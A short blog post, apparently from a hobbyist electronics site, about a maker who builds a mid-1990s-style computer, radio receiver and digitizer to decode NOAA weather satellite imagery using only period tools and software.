For certain situations, older hardware is preferred or even needed to accomplish a task. This is common in industrial applications where old machinery might not be supported by modern hardware or software. Even in these situations though, we have the benefit of modern technology and the Internet to get these systems up and running again. [Old Computers Sucked] is not only building a mid-90s system to receive NOAA satellite imagery, he’s doing it only with tools and equipment available to someone from this era.
Of course the first step here is to set up a computer and the relevant software that an amateur radio operator would have had access to in 1994. [Old Computers Sucked] already had the computer, so he turned to JV-FAX for software. This tool can decode the APT encoding used by some NOAA satellites without immediately filling his 2 MB hard drive, so with that out of the way he starts on building the radio.
In the 90s, wire wrapping was common for prototyping so he builds a hardware digitizer interface using this method, which will be used to help the computer interface with the radio. [Old Computers Sucked] is rolling his own hardware here as well, based on a Motorola MC3362 VHF FM chip and a phase-locked loop (PLL), although this time on a PCB since RF doesn’t behave nicely with wire wrap. The PCB design is also done with software from the 90s, in this case Protel which is known today as Altium Designer.
In the end, [Old Computers Sucked] was able to receive portions of imagery from weather satellites still using the analog FM signals from days of yore, but there are a few problems with his build that are keeping him from seeing perfectly clear imagery. He’s not exactly sure what’s wrong, but he suspects it’s the hardware digitizer, as it was behaving erratically earlier in the build. We admire his dedication to the time period, though, down to almost every detail of the build. It reminds us of [saveitforparts]’s effort to get an 80s satellite internet experience a little while back.